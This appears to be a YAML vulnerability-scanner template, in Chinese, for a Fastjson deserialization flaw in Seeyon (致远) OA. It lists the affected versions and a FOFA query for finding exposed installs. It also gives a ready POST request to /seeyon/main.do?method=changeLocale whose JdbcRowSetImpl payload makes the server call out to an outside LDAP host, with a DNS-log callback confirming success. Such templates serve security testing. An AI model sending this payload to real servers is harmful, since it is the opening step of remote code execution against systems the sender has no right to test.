product: 致远OA
vName: 致远OA Fastjson反序列化漏洞
type: 反序列化
vID: [ ]
level: 3
vDesc: fastjson在解析json（反序列化）的过程中，支持使用@Type来实例化一个具体类，且自动调用这个类的set/get方法来访问属性。黑客通过查找代码中的get方法，来远程加载恶意命令，即造成反序列化漏洞。服务器的fastjson在处理json数据的过程中，没有对@type进行校验，攻击者就可以传入危险类，并且调用危险的类远程连接ldap/rmi服务，通过ldap/rmi服务上的恶意代码执行远程命令。
version: V7.1、V7.1SP1、V7.0、V7.0SP1、V7.0SP2、V7.0SP3、V6.1、V6.1SP1、V6.1SP2、V6.0、V6.0SP1、V5.6、V5.6SP1
note: ''
search:
  FOFA: app="致远互联-OA"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: dnslog
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /seeyon/main.do?method=changeLocale
      data: '_json_params={"v47": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},"xxx": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://fastjson.{{m:rep}}","autoCommit": true}}'
    verify:
      path: ''
      logic: and
      check:
        - model: dnslog